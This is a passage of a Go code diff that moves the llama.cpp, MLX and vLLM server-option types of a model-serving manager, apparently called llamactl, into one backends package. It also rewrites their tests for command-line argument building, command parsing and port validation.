if !testutil.ContainsFlagWithValue(args, flag, value) {
t.Errorf("Expected %s %s, not found in %v", flag, value, args)
}
}
}
}
func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
options := llamacpp.LlamaServerOptions{
func TestLlamaCppBuildCommandArgs_EmptyArrays(t *testing.T) {
options := backends.LlamaServerOptions{
Lora: []string{}, // Empty array should not generate args
OverrideTensor: []string{}, // Empty array should not generate args
}
@@ -187,43 +124,13 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
excludedArgs := []string{"--lora", "--override-tensor"}
for _, excludedArg := range excludedArgs {
if contains(args, excludedArg) {
if testutil.Contains(args, excludedArg) {
t.Errorf("Empty array should not generate argument %q in %v", excludedArg, args)
}
}
}
// TestBuildCommandArgs_FieldNameConversion checks that option names written
// in snake_case are emitted as kebab-case command line flags.
func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
	opts := llamacpp.LlamaServerOptions{
		CtxSize:      4096,
		GPULayers:    32,
		ThreadsBatch: 2,
		FlashAttn:    true,
		TopK:         40,
		TopP:         0.9,
	}
	got := opts.BuildCommandArgs()

	// snake_case option name -> expected kebab-case flag
	wantFlags := [...]string{
		"--ctx-size",      // ctx_size
		"--gpu-layers",    // gpu_layers
		"--threads-batch", // threads_batch
		"--flash-attn",    // flash_attn
		"--top-k",         // top_k
		"--top-p",         // top_p
	}
	for _, want := range wantFlags {
		if contains(got, want) {
			continue
		}
		t.Errorf("Expected flag %q not found in %v", want, got)
	}
}
func TestUnmarshalJSON_StandardFields(t *testing.T) {
func TestLlamaCppUnmarshalJSON_StandardFields(t *testing.T) {
jsonData := `{
"model": "/path/to/model.gguf",
"port": 8080,
@@ -234,7 +141,7 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
"temp": 0.7
}`
var options llamacpp.LlamaServerOptions
var options backends.LlamaServerOptions
err := json.Unmarshal([]byte(jsonData), &options)
if err != nil {
t.Fatalf("Unmarshal failed: %v", err)
@@ -263,16 +170,16 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
}
}
func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
func TestLlamaCppUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
tests := []struct {
name string
jsonData string
checkFn func(llamacpp.LlamaServerOptions) error
checkFn func(backends.LlamaServerOptions) error
}{
{
name: "threads alternatives",
jsonData: `{"t": 4, "tb": 2}`,
checkFn: func(opts llamacpp.LlamaServerOptions) error {
checkFn: func(opts backends.LlamaServerOptions) error {
if opts.Threads != 4 {
return fmt.Errorf("expected threads 4, got %d", opts.Threads)
}
@@ -285,7 +192,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "context size alternatives",
jsonData: `{"c": 2048}`,
checkFn: func(opts llamacpp.LlamaServerOptions) error {
checkFn: func(opts backends.LlamaServerOptions) error {
if opts.CtxSize != 2048 {
return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
}
@@ -295,7 +202,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "gpu layers alternatives",
jsonData: `{"ngl": 16}`,
checkFn: func(opts llamacpp.LlamaServerOptions) error {
checkFn: func(opts backends.LlamaServerOptions) error {
if opts.GPULayers != 16 {
return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
}
@@ -305,7 +212,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "model alternatives",
jsonData: `{"m": "/path/model.gguf"}`,
checkFn: func(opts llamacpp.LlamaServerOptions) error {
checkFn: func(opts backends.LlamaServerOptions) error {
if opts.Model != "/path/model.gguf" {
return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
}
@@ -315,7 +222,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "temperature alternatives",
jsonData: `{"temp": 0.8}`,
checkFn: func(opts llamacpp.LlamaServerOptions) error {
checkFn: func(opts backends.LlamaServerOptions) error {
if opts.Temperature != 0.8 {
return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
}
@@ -326,7 +233,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
var options llamacpp.LlamaServerOptions
var options backends.LlamaServerOptions
err := json.Unmarshal([]byte(tt.jsonData), &options)
if err != nil {
t.Fatalf("Unmarshal failed: %v", err)
@@ -339,24 +246,24 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
}
}
func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
func TestLlamaCppUnmarshalJSON_InvalidJSON(t *testing.T) {
invalidJSON := `{"port": "not-a-number", "invalid": syntax}`
var options llamacpp.LlamaServerOptions
var options backends.LlamaServerOptions
err := json.Unmarshal([]byte(invalidJSON), &options)
if err == nil {
t.Error("Expected error for invalid JSON")
}
}
func TestUnmarshalJSON_ArrayFields(t *testing.T) {
func TestLlamaCppUnmarshalJSON_ArrayFields(t *testing.T) {
jsonData := `{
"lora": ["adapter1.bin", "adapter2.bin"],
"override_tensor": ["tensor1", "tensor2"],
"dry_sequence_breaker": [".", "!", "?"]
}`
var options llamacpp.LlamaServerOptions
var options backends.LlamaServerOptions
err := json.Unmarshal([]byte(jsonData), &options)
if err != nil {
t.Fatalf("Unmarshal failed: %v", err)
@@ -383,26 +290,81 @@ func TestParseLlamaCommand(t *testing.T) {
name string
command string
expectErr bool
validate func(*testing.T, *backends.LlamaServerOptions)
}{
{
name: "basic command",
command: "llama-server --model /path/to/model.gguf --gpu-layers 32",
expectErr: false,
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
if opts.Model != "/path/to/model.gguf" {
t.Errorf("expected model '/path/to/model.gguf', got '%s'", opts.Model)
}
if opts.GPULayers != 32 {
t.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
}
},
},
{
name: "args only",
command: "--model /path/to/model.gguf --ctx-size 4096",
expectErr: false,
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
if opts.Model != "/path/to/model.gguf" {
t.Errorf("expected model '/path/to/model.gguf', got '%s'", opts.Model)
}
if opts.CtxSize != 4096 {
t.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
}
},
},
{
name: "mixed flag formats",
command: "llama-server --model=/path/model.gguf --gpu-layers 16 --verbose",
expectErr: false,
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
if opts.Model != "/path/model.gguf" {
t.Errorf("expected model '/path/model.gguf', got '%s'", opts.Model)
}
if opts.GPULayers != 16 {
t.Errorf("expected gpu_layers 16, got %d", opts.GPULayers)
}
if !opts.Verbose {
t.Errorf("expected verbose to be true")
}
},
},
{
name: "quoted strings",
command: `llama-server --model test.gguf --api-key "sk-1234567890abcdef"`,
expectErr: false,
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
if opts.APIKey != "sk-1234567890abcdef" {
t.Errorf("expected api_key 'sk-1234567890abcdef', got '%s'", opts.APIKey)
}
},
},
{
name: "multiple value types",
command: "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap",
expectErr: false,
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
if opts.Model != "/test/model.gguf" {
t.Errorf("expected model '/test/model.gguf', got '%s'", opts.Model)
}
if opts.GPULayers != 32 {
t.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
}
if opts.Temperature != 0.7 {
t.Errorf("expected temperature 0.7, got %f", opts.Temperature)
}
if !opts.Verbose {
t.Errorf("expected verbose to be true")
}
if !opts.NoMmap {
t.Errorf("expected no_mmap to be true")
}
},
},
{
name: "empty command",
@@ -423,7 +385,9 @@ func TestParseLlamaCommand(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := llamacpp.ParseLlamaCommand(tt.command)
var opts backends.LlamaServerOptions
resultAny, err := opts.ParseCommand(tt.command)
result, _ := resultAny.(*backends.LlamaServerOptions)
if tt.expectErr {
if err == nil {
@@ -439,43 +403,21 @@ func TestParseLlamaCommand(t *testing.T) {
if result == nil {
t.Errorf("expected result but got nil")
return
}
if tt.validate != nil {
tt.validate(t, result)
}
})
}
}
// TestParseLlamaCommandValues parses one command that mixes string, integer,
// float and boolean flags and checks every resulting field.
func TestParseLlamaCommandValues(t *testing.T) {
	const cmd = "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap"

	parsed, err := llamacpp.ParseLlamaCommand(cmd)
	if err != nil {
		t.Fatalf("unexpected error: %v", err)
	}

	if got := parsed.Model; got != "/test/model.gguf" {
		t.Errorf("expected model '/test/model.gguf', got '%s'", got)
	}
	if got := parsed.GPULayers; got != 32 {
		t.Errorf("expected gpu_layers 32, got %d", got)
	}
	if got := parsed.Temperature; got != 0.7 {
		t.Errorf("expected temperature 0.7, got %f", got)
	}
	if !parsed.Verbose {
		t.Errorf("expected verbose to be true")
	}
	if !parsed.NoMmap {
		t.Errorf("expected no_mmap to be true")
	}
}
func TestParseLlamaCommandArrays(t *testing.T) {
command := "llama-server --model test.gguf --lora adapter1.bin --lora=adapter2.bin"
result, err := llamacpp.ParseLlamaCommand(command)
var opts backends.LlamaServerOptions
resultAny, err := opts.ParseCommand(command)
result, _ := resultAny.(*backends.LlamaServerOptions)
if err != nil {
t.Fatalf("unexpected error: %v", err)
@@ -492,20 +434,3 @@ func TestParseLlamaCommandArrays(t *testing.T) {
}
}
}
// Helper functions
// contains reports whether item occurs anywhere in slice.
func contains(slice []string, item string) bool {
	return slices.Index(slice, item) >= 0
}
// containsFlagWithValue reports whether args contains flag immediately
// followed by value. A flag in the last position has no following value and
// therefore never matches.
func containsFlagWithValue(args []string, flag, value string) bool {
	// Stop one short of the end so args[i+1] is always in range.
	for i := 0; i+1 < len(args); i++ {
		if args[i] != flag {
			continue
		}
		if args[i+1] == value {
			return true
		}
	}
	return false
}

View File

@@ -1,7 +1,8 @@
package mlx
package backends
import (
"llamactl/pkg/backends"
"fmt"
"llamactl/pkg/validation"
)
type MlxServerOptions struct {
@@ -30,25 +31,58 @@ type MlxServerOptions struct {
MaxTokens int `json:"max_tokens,omitempty"`
}
// BuildCommandArgs converts to command line arguments
func (o *MlxServerOptions) BuildCommandArgs() []string {
multipleFlags := map[string]bool{} // MLX doesn't currently have []string fields
return backends.BuildCommandArgs(o, multipleFlags)
// GetPort returns the port stored in the MLX server options.
func (o *MlxServerOptions) GetPort() int {
return o.Port
}
// ParseMlxCommand parses a mlx_lm.server command string into MlxServerOptions
// SetPort overwrites the port stored in the MLX server options.
func (o *MlxServerOptions) SetPort(port int) {
o.Port = port
}
// GetHost returns the host stored in the MLX server options.
func (o *MlxServerOptions) GetHost() string {
return o.Host
}
// Validate checks the MLX server options and returns the first problem found.
//
// It rejects a nil receiver, runs validation.ValidateStructStrings over the
// struct (presumably a screen of its string fields; see the validation
// package), and requires Port to lie within 0..65535.
func (o *MlxServerOptions) Validate() error {
	if o == nil {
		return validation.ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend"))
	}

	stringErr := validation.ValidateStructStrings(o, "")
	if stringErr != nil {
		return stringErr
	}

	// Basic network validation: the port must fit in the TCP/UDP port range.
	if port := o.Port; port < 0 || port > 65535 {
		return validation.ValidationError(fmt.Errorf("invalid port range: %d", port))
	}

	return nil
}
// BuildCommandArgs converts the MLX server options into command line
// arguments by delegating to the package-level BuildCommandArgs helper.
// The multi-valued flag set passed along is empty because MLX currently has
// no []string fields.
func (o *MlxServerOptions) BuildCommandArgs() []string {
	return BuildCommandArgs(o, map[string]struct{}{})
}
// BuildDockerArgs always returns an empty, non-nil argument slice for MLX.
func (o *MlxServerOptions) BuildDockerArgs() []string {
return []string{}
}
// ParseCommand parses a mlx_lm.server command string into MlxServerOptions
// Supports multiple formats:
// 1. Full command: "mlx_lm.server --model model/path"
// 2. Full path: "/usr/local/bin/mlx_lm.server --model model/path"
// 3. Args only: "--model model/path --host 0.0.0.0"
// 4. Multiline commands with backslashes
func ParseMlxCommand(command string) (*MlxServerOptions, error) {
func (o *MlxServerOptions) ParseCommand(command string) (any, error) {
executableNames := []string{"mlx_lm.server"}
var subcommandNames []string // MLX has no subcommands
multiValuedFlags := map[string]bool{} // MLX has no multi-valued flags
var subcommandNames []string // MLX has no subcommands
multiValuedFlags := map[string]struct{}{} // MLX has no multi-valued flags
var mlxOptions MlxServerOptions
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
if err := parseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
return nil, err
}

View File

@@ -1,157 +0,0 @@
package mlx_test
import (
"llamactl/pkg/backends/mlx"
"testing"
)
// TestParseMlxCommand feeds a table of command strings to mlx.ParseMlxCommand.
// Cases flagged expectErr must return an error; every other case must parse
// without error and produce a non-nil result.
func TestParseMlxCommand(t *testing.T) {
	cases := []struct {
		name      string
		command   string
		expectErr bool
	}{
		{"basic command", "mlx_lm.server --model /path/to/model --host 0.0.0.0", false},
		{"args only", "--model /path/to/model --port 8080", false},
		{"mixed flag formats", "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code", false},
		{"quoted strings", `mlx_lm.server --model test.mlx --chat-template "User: {user}\nAssistant: "`, false},
		{"empty command", "", true},
		{"unterminated quote", `mlx_lm.server --model test.mlx --chat-template "unterminated`, true},
		{"malformed flag", "mlx_lm.server ---model test.mlx", true},
	}

	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			parsed, err := mlx.ParseMlxCommand(tc.command)

			// Exactly one branch applies; the first matching one decides.
			switch {
			case tc.expectErr:
				if err == nil {
					t.Errorf("expected error but got none")
				}
			case err != nil:
				t.Errorf("unexpected error: %v", err)
			case parsed == nil:
				t.Errorf("expected result but got nil")
			}
		})
	}
}
// TestParseMlxCommandValues parses one command that mixes string, integer,
// float and boolean flags and checks every resulting field.
func TestParseMlxCommandValues(t *testing.T) {
	const cmd = "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG"

	parsed, err := mlx.ParseMlxCommand(cmd)
	if err != nil {
		t.Fatalf("unexpected error: %v", err)
	}

	if got := parsed.Model; got != "/test/model.mlx" {
		t.Errorf("expected model '/test/model.mlx', got '%s'", got)
	}
	if got := parsed.Port; got != 8080 {
		t.Errorf("expected port 8080, got %d", got)
	}
	if got := parsed.Temp; got != 0.7 {
		t.Errorf("expected temp 0.7, got %f", got)
	}
	if !parsed.TrustRemoteCode {
		t.Errorf("expected trust_remote_code to be true")
	}
	if got := parsed.LogLevel; got != "DEBUG" {
		t.Errorf("expected log_level 'DEBUG', got '%s'", got)
	}
}
// TestBuildCommandArgs builds the argument list for a fully populated
// MlxServerOptions. For every known value-carrying flag that appears in the
// output it checks the argument that follows, and it requires the
// --trust-remote-code boolean flag to be present.
//
// NOTE(review): a value-carrying flag that is missing from the output
// altogether is not reported by this test.
func TestBuildCommandArgs(t *testing.T) {
	opts := &mlx.MlxServerOptions{
		Model:           "/test/model.mlx",
		Host:            "127.0.0.1",
		Port:            8080,
		Temp:            0.7,
		TopP:            0.9,
		TopK:            40,
		MaxTokens:       2048,
		TrustRemoteCode: true,
		LogLevel:        "DEBUG",
		ChatTemplate:    "custom template",
	}
	got := opts.BuildCommandArgs()

	// Value expected directly after each flag.
	wantValues := map[string]string{
		"--model":         "/test/model.mlx",
		"--host":          "127.0.0.1",
		"--port":          "8080",
		"--log-level":     "DEBUG",
		"--chat-template": "custom template",
		"--temp":          "0.7",
		"--top-p":         "0.9",
		"--top-k":         "40",
		"--max-tokens":    "2048",
	}

	for i, arg := range got {
		switch arg {
		case "--trust-remote-code", "--use-default-chat-template":
			continue // Boolean flag with no value
		}

		want, known := wantValues[arg]
		if !known || i+1 >= len(got) {
			continue
		}
		if next := got[i+1]; next != want {
			t.Errorf("expected %s to have value %s, got %s", arg, want, next)
		}
	}

	// Check boolean flags
	sawTrustRemoteCode := false
	for _, arg := range got {
		if arg == "--trust-remote-code" {
			sawTrustRemoteCode = true
			break
		}
	}
	if !sawTrustRemoteCode {
		t.Errorf("expected --trust-remote-code flag to be present")
	}
}

204
pkg/backends/mlx_test.go Normal file
View File

@@ -0,0 +1,204 @@
package backends_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/testutil"
"testing"
)
// TestParseMlxCommand runs MlxServerOptions.ParseCommand over a table of
// command strings. Cases flagged expectErr only need to return an error.
// Every other case must parse without error and yield a
// *backends.MlxServerOptions, which is passed to the case's validate
// callback for field-level checks.
func TestParseMlxCommand(t *testing.T) {
	type parseCase struct {
		name      string
		command   string
		expectErr bool
		validate  func(*testing.T, *backends.MlxServerOptions)
	}

	cases := []parseCase{
		{
			name:    "basic command",
			command: "mlx_lm.server --model /path/to/model --host 0.0.0.0",
			validate: func(t *testing.T, got *backends.MlxServerOptions) {
				if got.Model != "/path/to/model" {
					t.Errorf("expected model '/path/to/model', got '%s'", got.Model)
				}
				if got.Host != "0.0.0.0" {
					t.Errorf("expected host '0.0.0.0', got '%s'", got.Host)
				}
			},
		},
		{
			name:    "args only",
			command: "--model /path/to/model --port 8080",
			validate: func(t *testing.T, got *backends.MlxServerOptions) {
				if got.Model != "/path/to/model" {
					t.Errorf("expected model '/path/to/model', got '%s'", got.Model)
				}
				if got.Port != 8080 {
					t.Errorf("expected port 8080, got %d", got.Port)
				}
			},
		},
		{
			name:    "mixed flag formats",
			command: "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code",
			validate: func(t *testing.T, got *backends.MlxServerOptions) {
				if got.Model != "/path/model" {
					t.Errorf("expected model '/path/model', got '%s'", got.Model)
				}
				if got.Temp != 0.7 {
					t.Errorf("expected temp 0.7, got %f", got.Temp)
				}
				if !got.TrustRemoteCode {
					t.Errorf("expected trust_remote_code to be true")
				}
			},
		},
		{
			name:    "multiple value types",
			command: "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG",
			validate: func(t *testing.T, got *backends.MlxServerOptions) {
				if got.Model != "/test/model.mlx" {
					t.Errorf("expected model '/test/model.mlx', got '%s'", got.Model)
				}
				if got.Port != 8080 {
					t.Errorf("expected port 8080, got %d", got.Port)
				}
				if got.Temp != 0.7 {
					t.Errorf("expected temp 0.7, got %f", got.Temp)
				}
				if !got.TrustRemoteCode {
					t.Errorf("expected trust_remote_code to be true")
				}
				if got.LogLevel != "DEBUG" {
					t.Errorf("expected log_level 'DEBUG', got '%s'", got.LogLevel)
				}
			},
		},
		{name: "empty command", command: "", expectErr: true},
		{name: "unterminated quote", command: `mlx_lm.server --model test.mlx --chat-template "unterminated`, expectErr: true},
		{name: "malformed flag", command: "mlx_lm.server ---model test.mlx", expectErr: true},
	}

	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			var parser backends.MlxServerOptions
			parsed, err := parser.ParseCommand(tc.command)
			// ParseCommand returns `any`; a failed assertion leaves got nil,
			// which the nil check below reports.
			got, _ := parsed.(*backends.MlxServerOptions)

			// Exactly one branch applies; the first matching one decides.
			switch {
			case tc.expectErr:
				if err == nil {
					t.Errorf("expected error but got none")
				}
			case err != nil:
				t.Errorf("unexpected error: %v", err)
			case got == nil:
				t.Errorf("expected result but got nil")
			case tc.validate != nil:
				tc.validate(t, got)
			}
		})
	}
}
// TestMlxBuildCommandArgs_BooleanFields checks that boolean MLX options set to
// true are emitted as flags and that options left false are not emitted.
func TestMlxBuildCommandArgs_BooleanFields(t *testing.T) {
	type boolCase struct {
		name     string
		options  backends.MlxServerOptions
		expected []string // flags that must be present
		excluded []string // flags that must be absent
	}

	cases := []boolCase{
		{
			name:     "trust_remote_code true",
			options:  backends.MlxServerOptions{TrustRemoteCode: true},
			expected: []string{"--trust-remote-code"},
		},
		{
			name:     "trust_remote_code false",
			options:  backends.MlxServerOptions{TrustRemoteCode: false},
			excluded: []string{"--trust-remote-code"},
		},
		{
			name: "multiple booleans",
			options: backends.MlxServerOptions{
				TrustRemoteCode:        true,
				UseDefaultChatTemplate: true,
			},
			expected: []string{"--trust-remote-code", "--use-default-chat-template"},
		},
	}

	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			got := tc.options.BuildCommandArgs()

			for _, want := range tc.expected {
				if testutil.Contains(got, want) {
					continue
				}
				t.Errorf("Expected argument %q not found in %v", want, got)
			}

			for _, unwanted := range tc.excluded {
				if !testutil.Contains(got, unwanted) {
					continue
				}
				t.Errorf("Excluded argument %q found in %v", unwanted, got)
			}
		})
	}
}
// TestMlxBuildCommandArgs_ZeroValues checks that options left at their zero
// value produce neither a flag nor a value in the generated arguments.
func TestMlxBuildCommandArgs_ZeroValues(t *testing.T) {
	// Every field below is explicitly set to its zero value.
	opts := backends.MlxServerOptions{
		Port:            0,
		TopK:            0,
		Temp:            0,
		Model:           "",
		LogLevel:        "",
		TrustRemoteCode: false,
	}
	got := opts.BuildCommandArgs()

	// Flags and their would-be values are checked as independent entries:
	// none of these strings may appear anywhere in the argument list.
	unwanted := []string{
		"--port", "0",
		"--top-k", "0",
		"--temp", "0",
		"--model", "",
		"--log-level", "",
		"--trust-remote-code",
	}
	for _, arg := range unwanted {
		if !testutil.Contains(got, arg) {
			continue
		}
		t.Errorf("Zero value argument %q should not be present in %v", arg, got)
	}
}

View File

@@ -9,8 +9,8 @@ import (
"strings"
)
// ParseCommand parses a command string into a target struct
func ParseCommand(command string, executableNames []string, subcommandNames []string, multiValuedFlags map[string]bool, target any) error {
// parseCommand parses a command string into a target struct
func parseCommand(command string, executableNames []string, subcommandNames []string, multiValuedFlags map[string]struct{}, target any) error {
// Normalize multiline commands
command = normalizeCommand(command)
if command == "" {
@@ -125,7 +125,7 @@ func extractArgs(command string, executableNames []string, subcommandNames []str
}
// parseFlags parses command line flags into a map
func parseFlags(args []string, multiValuedFlags map[string]bool) (map[string]any, error) {
func parseFlags(args []string, multiValuedFlags map[string]struct{}) (map[string]any, error) {
options := make(map[string]any)
for i := 0; i < len(args); i++ {
@@ -163,7 +163,7 @@ func parseFlags(args []string, multiValuedFlags map[string]bool) (map[string]any
if hasValue {
// Handle multi-valued flags
if multiValuedFlags[flagName] {
if _, isMultiValue := multiValuedFlags[flagName]; isMultiValue {
if existing, ok := options[flagName].([]string); ok {
options[flagName] = append(existing, value)
} else {

View File

@@ -1,16 +1,21 @@
package vllm
package backends
import (
"llamactl/pkg/backends"
"fmt"
"llamactl/pkg/validation"
)
// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
var multiValuedFlags = map[string]bool{
"api-key": true,
"allowed-origins": true,
"allowed-methods": true,
"allowed-headers": true,
"middleware": true,
// vllmMultiValuedFlags is the set of vLLM flags that are repeated once per
// value instead of being joined with commas.
// The list follows vLLM's CLI argument definitions (action='append' or List
// types). Keys are snake_case because the parser converts kebab-case flags to
// snake_case before looking them up.
var vllmMultiValuedFlags = map[string]struct{}{
	"allowed_headers": {}, // --allowed-headers (List type)
	"allowed_methods": {}, // --allowed-methods (List type)
	"allowed_origins": {}, // --allowed-origins (List type)
	"api_key":         {}, // --api-key (action='append')
	"lora_modules":    {}, // --lora-modules (custom LoRAParserAction, accepts multiple)
	"middleware":      {}, // --middleware (action='append')
	"prompt_adapters": {}, // --prompt-adapters (similar to lora-modules, accepts multiple)
}
type VllmServerOptions struct {
@@ -139,6 +144,36 @@ type VllmServerOptions struct {
OverrideKVCacheALIGNSize int `json:"override_kv_cache_align_size,omitempty"`
}
// GetPort returns the port stored in the vLLM server options.
func (o *VllmServerOptions) GetPort() int {
return o.Port
}
// SetPort overwrites the port stored in the vLLM server options.
func (o *VllmServerOptions) SetPort(port int) {
o.Port = port
}
// GetHost returns the host stored in the vLLM server options.
func (o *VllmServerOptions) GetHost() string {
return o.Host
}
// Validate checks the vLLM server options and returns the first problem found.
//
// It rejects a nil receiver, runs validation.ValidateStructStrings over the
// struct, and requires Port to lie within 0..65535.
func (o *VllmServerOptions) Validate() error {
	if o == nil {
		return validation.ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend"))
	}

	// Use reflection to check all string fields for injection patterns
	stringErr := validation.ValidateStructStrings(o, "")
	if stringErr != nil {
		return stringErr
	}

	// Basic network validation: the port must fit in the TCP/UDP port range.
	if port := o.Port; port < 0 || port > 65535 {
		return validation.ValidationError(fmt.Errorf("invalid port range: %d", port))
	}

	return nil
}
// BuildCommandArgs converts VllmServerOptions to command line arguments
// For vLLM native, model is a positional argument after "serve"
func (o *VllmServerOptions) BuildCommandArgs() []string {
@@ -155,7 +190,7 @@ func (o *VllmServerOptions) BuildCommandArgs() []string {
// Use package-level vllmMultiValuedFlags variable
flagArgs := backends.BuildCommandArgs(&optionsCopy, multiValuedFlags)
flagArgs := BuildCommandArgs(&optionsCopy, vllmMultiValuedFlags)
args = append(args, flagArgs...)
return args
@@ -165,34 +200,25 @@ func (o *VllmServerOptions) BuildDockerArgs() []string {
var args []string
// Use package-level vllmMultiValuedFlags variable
flagArgs := backends.BuildCommandArgs(o, multiValuedFlags)
flagArgs := BuildCommandArgs(o, vllmMultiValuedFlags)
args = append(args, flagArgs...)
return args
}
// ParseVllmCommand parses a vLLM serve command string into VllmServerOptions
// ParseCommand parses a vLLM serve command string into VllmServerOptions
// Supports multiple formats:
// 1. Full command: "vllm serve --model MODEL_NAME --other-args"
// 2. Full path: "/usr/local/bin/vllm serve --model MODEL_NAME"
// 3. Serve only: "serve --model MODEL_NAME --other-args"
// 4. Args only: "--model MODEL_NAME --other-args"
// 5. Multiline commands with backslashes
func ParseVllmCommand(command string) (*VllmServerOptions, error) {
func (o *VllmServerOptions) ParseCommand(command string) (any, error) {
executableNames := []string{"vllm"}
subcommandNames := []string{"serve"}
multiValuedFlags := map[string]bool{
"middleware": true,
"api_key": true,
"allowed_origins": true,
"allowed_methods": true,
"allowed_headers": true,
"lora_modules": true,
"prompt_adapters": true,
}
var vllmOptions VllmServerOptions
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil {
if err := parseCommand(command, executableNames, subcommandNames, vllmMultiValuedFlags, &vllmOptions); err != nil {
return nil, err
}

View File

@@ -1,153 +0,0 @@
package vllm_test
import (
"llamactl/pkg/backends/vllm"
"slices"
"testing"
)
// TestParseVllmCommand feeds a table of command strings to
// vllm.ParseVllmCommand. Cases flagged expectErr must return an error; every
// other case must parse without error and produce a non-nil result.
func TestParseVllmCommand(t *testing.T) {
	cases := []struct {
		name      string
		command   string
		expectErr bool
	}{
		{"basic vllm serve command", "vllm serve microsoft/DialoGPT-medium", false},
		{"serve only command", "serve microsoft/DialoGPT-medium", false},
		{"positional model with flags", "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2", false},
		{"model with path", "vllm serve /path/to/model --gpu-memory-utilization 0.8", false},
		{"empty command", "", true},
		{"unterminated quote", `vllm serve "unterminated`, true},
	}

	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			parsed, err := vllm.ParseVllmCommand(tc.command)

			// Exactly one branch applies; the first matching one decides.
			switch {
			case tc.expectErr:
				if err == nil {
					t.Errorf("expected error but got none")
				}
			case err != nil:
				t.Errorf("unexpected error: %v", err)
			case parsed == nil:
				t.Errorf("expected result but got nil")
			}
		})
	}
}
// TestParseVllmCommandValues parses one command with a positional model plus
// integer, float and boolean flags, and checks every resulting field.
func TestParseVllmCommandValues(t *testing.T) {
	const cmd = "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs"

	parsed, err := vllm.ParseVllmCommand(cmd)
	if err != nil {
		t.Fatalf("unexpected error: %v", err)
	}

	if got := parsed.Model; got != "test-model" {
		t.Errorf("expected model 'test-model', got '%s'", got)
	}
	if got := parsed.TensorParallelSize; got != 4 {
		t.Errorf("expected tensor_parallel_size 4, got %d", got)
	}
	if got := parsed.GPUMemoryUtilization; got != 0.8 {
		t.Errorf("expected gpu_memory_utilization 0.8, got %f", got)
	}
	if got := parsed.EnableLogOutputs; !got {
		t.Errorf("expected enable_log_outputs true, got %v", got)
	}
}
// TestBuildCommandArgs builds the native vLLM argument list and checks that
// the model is emitted as the first positional argument rather than a --model
// flag, that scalar and boolean flags are present, and that a list option is
// emitted as one flag per value.
func TestBuildCommandArgs(t *testing.T) {
	opts := vllm.VllmServerOptions{
		Model:                "microsoft/DialoGPT-medium",
		Port:                 8080,
		Host:                 "localhost",
		TensorParallelSize:   2,
		GPUMemoryUtilization: 0.8,
		EnableLogOutputs:     true,
		AllowedOrigins:       []string{"http://localhost:3000", "https://example.com"},
	}
	got := opts.BuildCommandArgs()

	// The model must lead the list as a positional argument...
	if len(got) == 0 || got[0] != "microsoft/DialoGPT-medium" {
		t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", got)
	}
	// ...and must not also be passed through a --model flag.
	if contains(got, "--model") {
		t.Errorf("Found --model flag, but model should be positional argument in args: %v", got)
	}

	// Check other flags
	if !containsFlagWithValue(got, "--tensor-parallel-size", "2") {
		t.Errorf("Expected --tensor-parallel-size 2 not found in %v", got)
	}
	if !contains(got, "--enable-log-outputs") {
		t.Errorf("Expected --enable-log-outputs not found in %v", got)
	}
	if !contains(got, "--host") {
		t.Errorf("Expected --host not found in %v", got)
	}
	if !contains(got, "--port") {
		t.Errorf("Expected --port not found in %v", got)
	}

	// Array handling: each AllowedOrigins entry gets its own flag.
	originFlags := 0
	for _, arg := range got {
		if arg == "--allowed-origins" {
			originFlags++
		}
	}
	if originFlags != 2 {
		t.Errorf("Expected 2 --allowed-origins flags, got %d", originFlags)
	}
}
// Helper functions
// contains reports whether item occurs anywhere in slice.
func contains(slice []string, item string) bool {
	return slices.ContainsFunc(slice, func(candidate string) bool {
